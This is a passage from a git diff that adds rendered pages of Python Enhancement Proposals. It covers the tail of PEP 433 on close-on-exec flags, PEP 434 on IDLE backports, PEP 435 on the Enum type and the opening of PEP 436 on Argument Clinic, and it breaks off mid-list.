socket.socket.accept()

+
• accept4() with SOCK_CLOEXEC flag [atomic]
• accept() + os.set_cloexec(fd, True) [best-effort]
+
+
+
+

Backward compatibility

+

There is no backward incompatible change. The default behaviour is unchanged: the close-on-exec flag is not set by default.

+
+
+

Appendix: Operating system support

+
+

Windows

+

Windows has an O_NOINHERIT flag: "Do not inherit in child processes".

For example, it is supported by open() and _pipe().

The inheritance flag can be cleared using SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0).

CreateProcess() has a bInheritHandles parameter: if it is FALSE, the handles are not inherited. If it is TRUE, handles with the HANDLE_FLAG_INHERIT flag set are inherited. subprocess.Popen uses the close_fds option to define bInheritHandles.

+
+
+

ioctl

+

Functions:

• ioctl(fd, FIOCLEX, 0): set the close-on-exec flag
• ioctl(fd, FIONCLEX, 0): clear the close-on-exec flag

Availability: Linux, Mac OS X, QNX, NetBSD, OpenBSD, FreeBSD.

+
+
+

fcntl

+

Functions:

• flags = fcntl(fd, F_GETFD); fcntl(fd, F_SETFD, flags | FD_CLOEXEC): set the close-on-exec flag
• flags = fcntl(fd, F_GETFD); fcntl(fd, F_SETFD, flags & ~FD_CLOEXEC): clear the close-on-exec flag

Availability: AIX, Digital UNIX, FreeBSD, HP-UX, IRIX, Linux, Mac OS X, OpenBSD, Solaris, SunOS, Unicos.

+
+
+

Atomic flags

+

New flags:

• O_CLOEXEC: available on Linux (2.6.23), FreeBSD (8.3), OpenBSD 5.0, Solaris 11, QNX, BeOS, next NetBSD release (6.1?). This flag is part of POSIX.1-2008.
• SOCK_CLOEXEC flag for socket() and socketpair(), available on Linux 2.6.27, OpenBSD 5.2, NetBSD 6.0.
• WSA_FLAG_NO_HANDLE_INHERIT flag for WSASocket(): supported on Windows 7 with SP1, Windows Server 2008 R2 with SP1, and later.
• fcntl(): F_DUPFD_CLOEXEC flag, available on Linux 2.6.24, OpenBSD 5.0, FreeBSD 9.1, NetBSD 6.0, Solaris 11. This flag is part of POSIX.1-2008.
• fcntl(): F_DUP2FD_CLOEXEC flag, available on FreeBSD 9.1 and Solaris 11.
• recvmsg(): MSG_CMSG_CLOEXEC, available on Linux 2.6.23, NetBSD 6.0.

On Linux older than 2.6.23, the O_CLOEXEC flag is simply ignored. So we have to check that the flag is supported by calling fcntl(). If it does not work, we have to set the flag using ioctl() or fcntl().

On Linux older than 2.6.27, if the SOCK_CLOEXEC flag is set in the socket type, socket() or socketpair() fail and errno is set to EINVAL.

On Windows XP SP3, WSASocket() fails with WSAEPROTOTYPE when the WSA_FLAG_NO_HANDLE_INHERIT flag is used.

New functions:

• dup3(): available on Linux 2.6.27 (and glibc 2.9)
• pipe2(): available on Linux 2.6.27 (and glibc 2.9)
• accept4(): available on Linux 2.6.28 (and glibc 2.10)

If accept4() is called on Linux older than 2.6.28, accept4() returns -1 (fail) and errno is set to ENOSYS.

+
+
+ +
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0433.rst

+

Last modified: 2023-09-09 17:39:29 GMT

\ No newline at end of file
diff --git a/pep-0434/index.html b/pep-0434/index.html
new file mode 100644
index 00000000000..1fa5f3bfbd2
--- /dev/null
+++ b/pep-0434/index.html
@@ -0,0 +1,309 @@

PEP 434 – IDLE Enhancement Exception for All Branches | peps.python.org
+
+


+ + +
+
+
+

PEP 434 – IDLE Enhancement Exception for All Branches

+
+
Author:
+
Todd Rovito <rovitotv at gmail.com>, +Terry Reedy <tjreedy at udel.edu>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
16-Feb-2013
+
Post-History:
+
16-Feb-2013, +03-Mar-2013, +21-Mar-2013, +30-Mar-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

Most CPython tracker issues are classified as behavior or enhancement. Most behavior patches are backported to branches for existing versions. Enhancement patches are restricted to the default branch that becomes the next Python version.

This PEP proposes that the restriction on applying enhancements be relaxed for IDLE code, residing in …/Lib/idlelib/. In practice, this would mean that IDLE developers would not have to classify or agree on the classification of a patch but could instead focus on what is best for IDLE users and future IDLE development. It would also mean that IDLE patches would not necessarily have to be split into 'bugfix' changes and enhancement changes.

The PEP would apply to changes in existing features and addition of small features, such as would require a new menu entry, but not necessarily to possible major re-writes such as switching to themed widgets or tabbed windows.

+
+
+

Motivation

+

This PEP was prompted by controversy on both the tracker and pydev list over adding Cut, Copy, and Paste to right-click context menus (Issue 1207589, opened in 2005 [1]; pydev thread [2]). The features were available as keyboard shortcuts but not on the context menu. It is standard, at least on Windows, that they should be when applicable (a read-only window would only have Copy), so users do not have to shift to the keyboard after selecting text for cutting or copying or a slice point for pasting. The context menu was not documented until 10 days before the new options were added (Issue 10405 [5]).

Normally, behavior is called a bug if it conflicts with documentation judged to be correct. But if there is no doc, what is the standard? If the code is its own documentation, most IDLE issues on the tracker are enhancement issues. If we substitute reasonable user expectation (which can, of course, be its own subject of disagreement), many more issues are behavior issues.

For context menus, people disagreed on the status of the additions - bugfix or enhancement. Even people who called it an enhancement disagreed as to whether the patch should be backported. This PEP proposes to make the status disagreement irrelevant by explicitly allowing more liberal backporting than for other stdlib modules.

Python does have many advanced features, yet Python is well known for being an easy computer language for beginners [3]. A major Python philosophy is "batteries included", which is best demonstrated in Python's standard library with many modules that are not typically included with other programming languages [4]. IDLE is an important "battery" in the Python toolbox because it allows a beginner to get started quickly without downloading and configuring a third party IDE. IDLE represents a commitment by the Python community to encourage the use of Python as a teaching language both inside and outside of formal educational settings. The recommended teaching experience is to have a learner start with IDLE. This PEP and the work that it will enable will allow the Python community to make that learner's experience with IDLE awesome by making IDLE a simple tool for beginners to get started with Python.

+
+
+

Rationale

+

People primarily use IDLE by running the graphical user interface (GUI) application, rather than by directly importing the effectively private (undocumented) implementation modules in idlelib. Whether they use the shell, the editor, or both, we believe they will benefit more from consistency across the latest releases of current Python versions than from consistency within the bugfix releases for one Python version. This is especially true when existing behavior is clearly unsatisfactory.

When people use the standard interpreter, the OS-provided frame works the same for all Python versions. If, for instance, Microsoft were to upgrade the Command Prompt GUI, the improvements would be present regardless of which Python were running within it. Similarly, if one edits Python code with editor X, behaviors such as the right-click context menu and the search-replace box do not depend on the version of Python being edited or even the language being edited.

The benefit for IDLE developers is mixed. On the one hand, testing more versions and possibly having to adjust a patch, especially for 2.7, is more work. (There is, of course, the option of not backporting everything. For issue 12510, some changes to calltips for classes were not included in the 2.7 patch because of issues with old-style classes [6].) On the other hand, bike-shedding can be an energy drain. If the obvious fix for a bug looks like an enhancement, writing a separate bugfix-only patch is more work. And making the code diverge between versions makes future multi-version patches more difficult.

These issues are illustrated by the search-and-replace dialog box. It used to raise an exception for certain user entries [7]. The uncaught exception caused IDLE to exit. At least on Windows, the exit was silent (no visible traceback) and looked like a crash if IDLE was started normally, from an icon.

Was this a bug? IDLE Help (on the current Help submenu) just says "Replace… Open a search-and-replace dialog box", and a box was opened. It is not, in general, a bug for a library method to raise an exception. And it is not, in general, a bug for a library method to ignore an exception raised by functions it calls. So if we were to adopt the 'code = doc' philosophy in the absence of detailed docs, one might say 'No'.

However, IDLE exiting when it does not need to is definitely obnoxious. So four of us agreed that it should be prevented. But there was still the question of what to do instead? Catch the exception? Just not raise the exception? Beep? Display an error message box? Or try to do something useful with the user's entry? Would replacing a 'crash' with useful behavior be an enhancement, limited to future Python releases? Should IDLE developers have to ask that?

+
+
+

Backwards Compatibility

+

For IDLE, there are three types of users who might be concerned about +back compatibility. First are people who run IDLE as an application. +We have already discussed them above.

+

Second are people who import one of the idlelib modules. As far as we +know, this is only done to start the IDLE application, and we do not +propose breaking such use. Otherwise, the modules are undocumented +and effectively private implementations. If an IDLE module were +defined as public, documented, and perhaps moved to the tkinter +package, it would then follow the normal rules. (Documenting the +private interfaces for the benefit of people working on the IDLE code +is a separate issue.)

+

Third are people who write IDLE extensions. The guaranteed extension +interface is given in idlelib/extension.txt. This should be respected +at least in existing versions, and not frivolously changed in future +versions. But there is a warning that “The extension cannot assume +much about this [EditorWindow] argument.” This guarantee should +rarely be an issue with patches, and the issue is not specific to +‘enhancement’ versus ‘bugfix’ patches.

+

As it happens, after the context menu patch was applied, it came up +that extensions that added items to the context menu (rare) would be +broken because the patch a) added a new item to standard rmenu_specs +and b) expected every rmenu_spec to be lengthened. It is not clear +whether this violates the guarantee, but there is a second patch that +fixes assumption b). It should be applied when it is clear that the +first patch will not have to be reverted.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0434.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0435/index.html b/pep-0435/index.html new file mode 100644 index 00000000000..29c8c1fdc73 --- /dev/null +++ b/pep-0435/index.html @@ -0,0 +1,750 @@ + + + + + + + + PEP 435 – Adding an Enum type to the Python standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 435 – Adding an Enum type to the Python standard library

+
+
Author:
+
Barry Warsaw <barry at python.org>, +Eli Bendersky <eliben at gmail.com>, +Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Feb-2013
+
Python-Version:
+
3.4
+
Post-History:
+
23-Feb-2013, 02-May-2013
+
Replaces:
+
354
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an enumeration type to the Python standard library.

+

An enumeration is a set of symbolic names bound to unique, constant values. +Within an enumeration, the values can be compared by identity, and the +enumeration itself can be iterated over.

+
+
+

Status of discussions

+

The idea of adding an enum type to Python is not new - PEP 354 is a +previous attempt that was rejected in 2005. Recently a new set of discussions +was initiated [3] on the python-ideas mailing list. Many new ideas were +proposed in several threads; after a lengthy discussion Guido proposed adding +flufl.enum to the standard library [4]. During the PyCon 2013 language +summit the issue was discussed further. It became clear that many developers +want to see an enum that subclasses int, which can allow us to replace +many integer constants in the standard library by enums with friendly string +representations, without ceding backwards compatibility. An additional +discussion among several interested core developers led to the proposal of +having IntEnum as a special case of Enum.

+

The key dividing issue between Enum and IntEnum is whether comparing +to integers is semantically meaningful. For most uses of enumerations, it’s +a feature to reject comparison to integers; enums that compare to integers +lead, through transitivity, to comparisons between enums of unrelated types, +which isn’t desirable in most cases. For some uses, however, greater +interoperability with integers is desired. For instance, this is the case for +replacing existing standard library constants (such as socket.AF_INET) +with enumerations.
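A minimal sketch of that transitivity hazard, using the IntEnum described below with two hypothetical enumerations:

from enum import IntEnum

class Color(IntEnum):
    red = 1

class Fruit(IntEnum):
    apple = 1

# each member compares equal to 1, so by transitivity the two
# unrelated enumerations also compare equal to each other
assert Color.red == 1
assert Fruit.apple == 1
assert Color.red == Fruit.apple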

+

Further discussion in late April 2013 led to the conclusion that enumeration +members should belong to the type of their enum: type(Color.red) == Color. +Guido has pronounced a decision on this issue [5], as well as on the related +issues of not allowing enums to be subclassed [6] unless they define no +enumeration members [7].

+

The PEP was accepted by Guido on May 10th, 2013 [1].

+
+
+

Motivation

+

[Based partly on the Motivation stated in PEP 354]

+

The properties of an enumeration are useful for defining an immutable, related +set of constant values that may or may not have a semantic meaning. Classic +examples are days of the week (Sunday through Saturday) and school assessment +grades (‘A’ through ‘D’, and ‘F’). Other examples include error status values +and states within a defined process.

+

It is possible to simply define a sequence of values of some other basic type, +such as int or str, to represent discrete arbitrary values. However, +an enumeration ensures that such values are distinct from any others including, +importantly, values within other enumerations, and that operations without +meaning (“Wednesday times two”) are not defined for these values. It also +provides a convenient printable representation of enum values without requiring +tedious repetition while defining them (i.e. no GREEN = 'green').
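As a brief sketch (with hypothetical names, not from the examples later in this PEP), contrast bare integer constants with enumeration members:

from enum import Enum

# plain int constants: unrelated values collide silently
MONDAY = 0
GRADE_A = 0
assert MONDAY == GRADE_A        # accidentally true

class Day(Enum):
    monday = 0

class Grade(Enum):
    a = 0

# members stay distinct even though their values are equal
assert Day.monday != Grade.a

# and "Monday times two" is simply not defined
try:
    Day.monday * 2
except TypeError:
    pass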

+
+
+

Module and type name

+

We propose to add a module named enum to the standard library. The main +type exposed by this module is Enum. Hence, to import the Enum type +user code will run:

+
>>> from enum import Enum
+
+
+
+
+

Proposed semantics for the new enumeration type

+
+

Creating an Enum

+

Enumerations are created using the class syntax, which makes them easy to read +and write. An alternative creation method is described in Functional API. +To define an enumeration, subclass Enum as follows:

+
>>> from enum import Enum
+>>> class Color(Enum):
+...     red = 1
+...     green = 2
+...     blue = 3
+
+
+

A note on nomenclature: we call Color an enumeration (or enum), +and Color.red and Color.green enumeration members (or +enum members). Enumeration members also have values (the value of +Color.red is 1, etc.)

+

Enumeration members have human readable string representations:

+
>>> print(Color.red)
+Color.red
+
+
+

…while their repr has more information:

+
>>> print(repr(Color.red))
+<Color.red: 1>
+
+
+

The type of an enumeration member is the enumeration it belongs to:

+
>>> type(Color.red)
+<Enum 'Color'>
+>>> isinstance(Color.green, Color)
+True
+>>>
+
+
+

Enums also have a property that contains just their item name:

+
>>> print(Color.red.name)
+red
+
+
+

Enumerations support iteration, in definition order:

+
>>> class Shake(Enum):
+...   vanilla = 7
+...   chocolate = 4
+...   cookies = 9
+...   mint = 3
+...
+>>> for shake in Shake:
+...   print(shake)
+...
+Shake.vanilla
+Shake.chocolate
+Shake.cookies
+Shake.mint
+
+
+

Enumeration members are hashable, so they can be used in dictionaries and sets:

+
>>> apples = {}
+>>> apples[Color.red] = 'red delicious'
+>>> apples[Color.green] = 'granny smith'
+>>> apples
+{<Color.red: 1>: 'red delicious', <Color.green: 2>: 'granny smith'}
+
+
+
+
+

Programmatic access to enumeration members

+

Sometimes it’s useful to access members in enumerations programmatically (i.e. +situations where Color.red won’t do because the exact color is not known +at program-writing time). Enum allows such access:

+
>>> Color(1)
+<Color.red: 1>
+>>> Color(3)
+<Color.blue: 3>
+
+
+

If you want to access enum members by name, use item access:

+
>>> Color['red']
+<Color.red: 1>
+>>> Color['green']
+<Color.green: 2>
+
+
+
+
+

Duplicating enum members and values

+

Having two enum members with the same name is invalid:

+
>>> class Shape(Enum):
+...   square = 2
+...   square = 3
+...
+Traceback (most recent call last):
+...
+TypeError: Attempted to reuse key: square
+
+
+

However, two enum members are allowed to have the same value. Given two members +A and B with the same value (and A defined first), B is an alias to A. By-value +lookup of the value of A and B will return A. By-name lookup of B will also +return A:

+
>>> class Shape(Enum):
+...   square = 2
+...   diamond = 1
+...   circle = 3
+...   alias_for_square = 2
+...
+>>> Shape.square
+<Shape.square: 2>
+>>> Shape.alias_for_square
+<Shape.square: 2>
+>>> Shape(2)
+<Shape.square: 2>
+
+
+

Iterating over the members of an enum does not provide the aliases:

+
>>> list(Shape)
+[<Shape.square: 2>, <Shape.diamond: 1>, <Shape.circle: 3>]
+
+
+

The special attribute __members__ is an ordered dictionary mapping names +to members. It includes all names defined in the enumeration, including the +aliases:

+
>>> for name, member in Shape.__members__.items():
+...   name, member
+...
+('square', <Shape.square: 2>)
+('diamond', <Shape.diamond: 1>)
+('circle', <Shape.circle: 3>)
+('alias_for_square', <Shape.square: 2>)
+
+
+

The __members__ attribute can be used for detailed programmatic access to +the enumeration members. For example, finding all the aliases:

+
>>> [name for name, member in Shape.__members__.items() if member.name != name]
+['alias_for_square']
+
+
+
+
+

Comparisons

+

Enumeration members are compared by identity:

+
>>> Color.red is Color.red
+True
+>>> Color.red is Color.blue
+False
+>>> Color.red is not Color.blue
+True
+
+
+

Ordered comparisons between enumeration values are not supported. Enums are +not integers (but see IntEnum below):

+
>>> Color.red < Color.blue
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: unorderable types: Color() < Color()
+
+
+

Equality comparisons are defined though:

+
>>> Color.blue == Color.red
+False
+>>> Color.blue != Color.red
+True
+>>> Color.blue == Color.blue
+True
+
+
+

Comparisons against non-enumeration values will always compare not equal +(again, IntEnum was explicitly designed to behave differently, see +below):

+
>>> Color.blue == 2
+False
+
+
+
+
+

Allowed members and attributes of enumerations

+

The examples above use integers for enumeration values. Using integers is +short and handy (and provided by default by the Functional API), but not +strictly enforced. In the vast majority of use-cases, one doesn’t care what +the actual value of an enumeration is. But if the value is important, +enumerations can have arbitrary values.
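A short sketch of non-integer values (a hypothetical enumeration; the proposal places no restriction on value types):

from enum import Enum

class Mineral(Enum):
    quartz = 'SiO2'
    pyrite = ('Fe', 'S2')

# by-value lookup and the value attribute work as usual
assert Mineral('SiO2') is Mineral.quartz
assert Mineral.pyrite.value == ('Fe', 'S2')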

+

Enumerations are Python classes, and can have methods and special methods as +usual. If we have this enumeration:

+
class Mood(Enum):
+  funky = 1
+  happy = 3
+
+  def describe(self):
+    # self is the member here
+    return self.name, self.value
+
+  def __str__(self):
+    return 'my custom str! {0}'.format(self.value)
+
+  @classmethod
+  def favorite_mood(cls):
+    # cls here is the enumeration
+    return cls.happy
+
+
+

Then:

+
>>> Mood.favorite_mood()
+<Mood.happy: 3>
+>>> Mood.happy.describe()
+('happy', 3)
+>>> str(Mood.funky)
+'my custom str! 1'
+
+
+

The rules for what is allowed are as follows: all attributes defined within an +enumeration will become members of this enumeration, with the exception of +__dunder__ names and descriptors [9]; methods are descriptors too.
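A sketch of that rule with a hypothetical enumeration: a plain assignment becomes a member, while a descriptor such as a property does not:

from enum import Enum

class Planet(Enum):
    earth = 1                  # plain attribute: becomes a member

    @property
    def is_home(self):         # descriptor: not a member
        return self is Planet.earth

assert list(Planet) == [Planet.earth]
assert Planet.earth.is_home is True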

+
+
+

Restricted subclassing of enumerations

+

Subclassing an enumeration is allowed only if the enumeration does not define +any members. So this is forbidden:

+
>>> class MoreColor(Color):
+...   pink = 17
+...
+TypeError: Cannot extend enumerations
+
+
+

But this is allowed:

+
>>> class Foo(Enum):
+...   def some_behavior(self):
+...     pass
+...
+>>> class Bar(Foo):
+...   happy = 1
+...   sad = 2
+...
+
+
+

The rationale for this decision was given by Guido in [6]. Allowing +subclassing of enums that define members would lead to a violation of some +important invariants of types and instances. On the other hand, it +makes sense to allow sharing some common behavior between a group of +enumerations, and subclassing empty enumerations is also used to implement +IntEnum.

+
+
+

IntEnum

+

A variation of Enum is proposed which is also a subclass of int. +Members of an IntEnum can be compared to integers; by extension, +integer enumerations of different types can also be compared to each other:

+
>>> from enum import IntEnum
+>>> class Shape(IntEnum):
+...   circle = 1
+...   square = 2
+...
+>>> class Request(IntEnum):
+...   post = 1
+...   get = 2
+...
+>>> Shape == 1
+False
+>>> Shape.circle == 1
+True
+>>> Shape.circle == Request.post
+True
+
+
+

However they still can’t be compared to Enum:

+
>>> class Shape(IntEnum):
+...   circle = 1
+...   square = 2
+...
+>>> class Color(Enum):
+...   red = 1
+...   green = 2
+...
+>>> Shape.circle == Color.red
+False
+
+
+

IntEnum values behave like integers in other ways you’d expect:

+
>>> int(Shape.circle)
+1
+>>> ['a', 'b', 'c'][Shape.circle]
+'b'
+>>> [i for i in range(Shape.square)]
+[0, 1]
+
+
+

For the vast majority of code, Enum is strongly recommended, +since IntEnum breaks some semantic promises of an enumeration (by +being comparable to integers, and thus by transitivity to other +unrelated enumerations). It should be used only in special cases where +there’s no other choice; for example, when integer constants are +replaced with enumerations and backwards compatibility is required +with code that still expects integers.

+
+
+

Other derived enumerations

+

IntEnum will be part of the enum module. However, it would be very +simple to implement independently:

+
class IntEnum(int, Enum):
+    pass
+
+
+

This demonstrates how similar derived enumerations can be defined, for example +a StrEnum that mixes in str instead of int.
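A sketch of that idea (StrEnum itself is not part of this proposal); note that, per rule 1 below, str appears before Enum in the bases:

from enum import Enum

class StrEnum(str, Enum):
    pass

class Mode(StrEnum):
    read = 'r'
    write = 'w'

# members behave like strings, analogously to IntEnum and integers
assert Mode.read == 'r'
assert Mode.write.upper() == 'W'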

+

Some rules:

+
    +
  1. When subclassing Enum, mix-in types must appear before Enum itself in the +sequence of bases, as in the IntEnum example above.
  2. While Enum can have members of any type, once you mix in an additional +type, all the members must have values of that type, e.g. int above. +This restriction does not apply to mix-ins which only add methods +and don’t specify another data type such as int or str.
+
+
+

Pickling

+

Enumerations can be pickled and unpickled:

+
>>> from enum.tests.fruit import Fruit
+>>> from pickle import dumps, loads
+>>> Fruit.tomato is loads(dumps(Fruit.tomato))
+True
+
+
+

The usual restrictions for pickling apply: picklable enums must be defined in +the top level of a module, since unpickling requires them to be importable +from that module.
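A sketch of the failure mode with a hypothetical local enum (the exact exception may vary by pickle protocol and implementation):

import pickle
from enum import Enum

def make_enum():
    class Local(Enum):         # not importable from the module top level
        a = 1
    return Local

try:
    pickle.dumps(make_enum().a)
except (pickle.PicklingError, AttributeError):
    print('local enums cannot be pickled')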

+
+
+

Functional API

+

The Enum class is callable, providing the following functional API:

+
>>> Animal = Enum('Animal', 'ant bee cat dog')
+>>> Animal
+<Enum 'Animal'>
+>>> Animal.ant
+<Animal.ant: 1>
+>>> Animal.ant.value
+1
+>>> list(Animal)
+[<Animal.ant: 1>, <Animal.bee: 2>, <Animal.cat: 3>, <Animal.dog: 4>]
+
+
+

The semantics of this API resemble namedtuple. The first argument +of the call to Enum is the name of the enumeration. Pickling enums +created with the functional API will work on CPython and PyPy, but for +IronPython and Jython you may need to specify the module name explicitly +as follows:

+
>>> Animals = Enum('Animals', 'ant bee cat dog', module=__name__)
+
+
+

The second argument is the source of enumeration member names. It can be a +whitespace-separated string of names, a sequence of names, a sequence of +2-tuples with key/value pairs, or a mapping (e.g. dictionary) of names to +values. The last two options enable assigning arbitrary values to +enumerations; the others auto-assign increasing integers starting with 1. A +new class derived from Enum is returned. In other words, the above +assignment to Animal is equivalent to:

+
>>> class Animals(Enum):
+...   ant = 1
+...   bee = 2
+...   cat = 3
+...   dog = 4
+
+
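Sketches of the other name sources described above, with hypothetical enumerations:

from enum import Enum

# a sequence of 2-tuples assigns explicit values...
Insect = Enum('Insect', [('ant', 1), ('bee', 2)])
assert Insect.bee.value == 2

# ...as does a mapping of names to values
Palette = Enum('Palette', {'red': 1, 'green': 2})
assert Palette.green.value == 2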
+

The reason for defaulting to 1 as the starting number and not 0 is +that 0 is False in a boolean sense, but enum members all evaluate +to True.
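A quick check of that property, reusing the Animal enumeration defined above:

>>> bool(Animal.ant)
True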

+
+
+
+

Proposed variations

+

Some variations were proposed during the discussions on the mailing list. +Here are some of the more popular ones.

+
+

flufl.enum

+

flufl.enum was the reference implementation upon which this PEP was +originally based. Eventually, it was decided against the inclusion of +flufl.enum because its design separated enumeration members from +enumerations, so the former are not instances of the latter. Its design +also explicitly permits subclassing enumerations for extending them with +more members (due to the member/enum separation, the type invariants are not +violated in flufl.enum with such a scheme).

+
+
+

Not having to specify values for enums

+

Michael Foord proposed (and Tim Delaney provided a proof-of-concept +implementation of) using metaclass magic to make this possible:

+
class Color(Enum):
+    red, green, blue
+
+
+

The values are actually assigned only when first looked up.

+

Pros: cleaner syntax that requires less typing for a very common task (just +listing enumeration names without caring about the values).

+

Cons: involves much magic in the implementation, which makes even the +definition of such enums baffling when first seen. Besides, explicit is +better than implicit.

+
+
+

Using special names or forms to auto-assign enum values

+

A different approach to avoid specifying enum values is to use a special name +or form to auto-assign them. For example:

+
class Color(Enum):
+    red = None          # auto-assigned to 0
+    green = None        # auto-assigned to 1
+    blue = None         # auto-assigned to 2
+
+
+

More flexibly:

+
class Color(Enum):
+    red = 7
+    green = None        # auto-assigned to 8
+    blue = 19
+    purple = None       # auto-assigned to 20
+
+
+

Some variations on this theme:

+
    +
  1. A special name auto imported from the enum package.
  2. Georg Brandl proposed ellipsis (...) instead of None to achieve the +same effect.
+

Pros: no need to manually enter values. Makes it easier to change the enum and +extend it, especially for large enumerations.

+

Cons: actually longer to type in many simple cases. The argument of explicit +vs. implicit applies here as well.

+
+
+
+

Use-cases in the standard library

+

The Python standard library has many places where enums would be a +beneficial replacement for other idioms currently used to represent them. Such +usages can be divided into two categories: user-code facing constants, and +internal constants.

+

User-code facing constants like os.SEEK_*, socket module constants, +decimal rounding modes and HTML error codes could require backwards +compatibility since user code may expect integers. IntEnum as described +above provides the required semantics; being a subclass of int, it does not +affect user code that expects integers, while on the other hand allowing +printable representations for enumeration values:

+
>>> import socket
+>>> family = socket.AF_INET
+>>> family == 2
+True
+>>> print(family)
+SocketFamily.AF_INET
+
+
+

Internal constants are not seen by user code but are employed internally by +stdlib modules. These can be implemented with Enum. Some examples +uncovered by a very partial skim through the stdlib: binhex, imaplib, +http/client, urllib/robotparser, idlelib, concurrent.futures, +turtledemo.

+

In addition, looking at the code of the Twisted library, there are many use +cases for replacing internal state constants with enums. The same can be said +about a lot of networking code (especially implementation of protocols) and +can be seen in test protocols written with the Tulip library as well.
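A sketch of that internal-state use case, with hypothetical protocol states:

from enum import Enum

class ConnectionState(Enum):
    disconnected = 1
    connecting = 2
    connected = 3

state = ConnectionState.connecting
assert state is not ConnectionState.connected    # identity-based checks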

+
+
+

Acknowledgments

+

This PEP initially proposed including the flufl.enum package [8] +by Barry Warsaw in the stdlib, and is inspired in large part by it. +Ben Finney is the author of the earlier enumeration PEP 354.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0435.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0436/index.html b/pep-0436/index.html new file mode 100644 index 00000000000..5af656d6952 --- /dev/null +++ b/pep-0436/index.html @@ -0,0 +1,861 @@ + + + + + + + + PEP 436 – The Argument Clinic DSL | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 436 – The Argument Clinic DSL

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Feb-2013
+
Python-Version:
+
3.4
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes “Argument Clinic”, a DSL to facilitate +argument processing for built-in functions in the implementation of +CPython.

+
+
+

Rationale and Goals

+

The primary implementation of Python, “CPython”, is written in a +mixture of Python and C. One implementation detail of CPython +is what are called “built-in” functions – functions available to +Python programs but written in C. When a Python program calls a +built-in function and passes in arguments, those arguments must be +translated from Python values into C values. This process is called +“parsing arguments”.

+

As of CPython 3.3, builtin functions nearly always parse their arguments +with one of two functions: the original PyArg_ParseTuple(), [1] and +the more modern PyArg_ParseTupleAndKeywords(). [2] The former +only handles positional parameters; the latter also accommodates keyword +and keyword-only parameters, and is preferred for new code.

+

With either function, the caller specifies the translation for +parsing arguments in a “format string”: [3] each parameter corresponds +to a “format unit”, a short character sequence telling the parsing +function what Python types to accept and how to translate them into +the appropriate C value for that parameter.

+

PyArg_ParseTuple() was reasonable when it was first conceived. +There were only a dozen or so of these “format units”; each one +was distinct, and easy to understand and remember. +But over the years the PyArg_Parse interface has been extended +in numerous ways. The modern API is complex, to the point that it +is somewhat painful to use. Consider:

+
    +
  • There are now forty different “format units”; a few are even three +characters long. This makes it difficult for the programmer to +understand what the format string says–or even perhaps to parse +it–without constantly cross-indexing it with the documentation.
  • +
  • There are also six meta-format units that may be buried in the +format string. (They are: "()|$:;".)
  • +
  • The more format units are added, the less likely it is the +implementer can pick an easy-to-use mnemonic for the format unit, +because the character of choice is probably already in use. In +other words, the more format units we have, the more obtuse the +format units become.
  • +
  • Several format units are nearly identical to others, having only +subtle differences. This makes understanding the exact semantics +of the format string even harder, and can make it difficult to +figure out exactly which format unit you want.
  • +
  • The docstring is specified as a static C string, making it mildly +bothersome to read and edit since it must obey C string quoting rules.
  • +
  • When adding a new parameter to a function using +PyArg_ParseTupleAndKeywords(), it’s necessary to touch six +different places in the code: [4]
      +
    • Declaring the variable to store the argument.
    • +
    • Passing in a pointer to that variable in the correct spot in +PyArg_ParseTupleAndKeywords(), also passing in any +“length” or “converter” arguments in the correct order.
    • +
    • Adding the name of the argument in the correct spot of the +“keywords” array passed in to +PyArg_ParseTupleAndKeywords().
    • +
    • Adding the format unit to the correct spot in the format +string.
    • +
    • Adding the parameter to the prototype in the docstring.
    • +
    • Documenting the parameter in the docstring.
    • +
    +
  • +
  • There is currently no mechanism for builtin functions to provide +their “signature” information (see inspect.getfullargspec and +inspect.Signature). Adding this information using a mechanism +similar to the existing PyArg_Parse functions would require +repeating ourselves yet again.
  • +
+

The goal of Argument Clinic is to replace this API with a mechanism +inheriting none of these downsides:

+
    +
  • You need to specify each parameter only once.
  • +
  • All information about a parameter is kept together in one place.
  • +
  • For each parameter, you specify a conversion function; Argument +Clinic handles the translation from Python value into C value for +you.
  • +
  • Argument Clinic also allows for fine-tuning of argument processing +behavior with parameterized conversion functions.
  • +
  • Docstrings are written in plain text. Function docstrings are +required; per-parameter docstrings are encouraged.
  • +
  • From this, Argument Clinic generates for you all the mundane, +repetitious code and data structures CPython needs internally. +Once you’ve specified the interface, the next step is simply to +write your implementation using native C types. Every detail of +argument parsing is handled for you.
  • +
+

Argument Clinic is implemented as a preprocessor. It draws inspiration +for its workflow directly from [Cog] by Ned Batchelder. To use Clinic, +add a block comment to your C source code beginning and ending with +special text strings, then run Clinic on the file. Clinic will find the +block comment, process the contents, and write the output back into your +C source file directly after the comment. The intent is that Clinic’s +output becomes part of your source code; it’s checked in to revision +control, and distributed with source packages. This means that Python +will still ship ready-to-build. It does complicate development slightly; +in order to add a new function, or modify the arguments or documentation +of an existing function using Clinic, you’ll need a working Python 3 +interpreter.

+

Future goals of Argument Clinic include:

+
    +
  • providing signature information for builtins,
  • +
  • enabling alternative implementations of Python to create +automated library compatibility tests, and
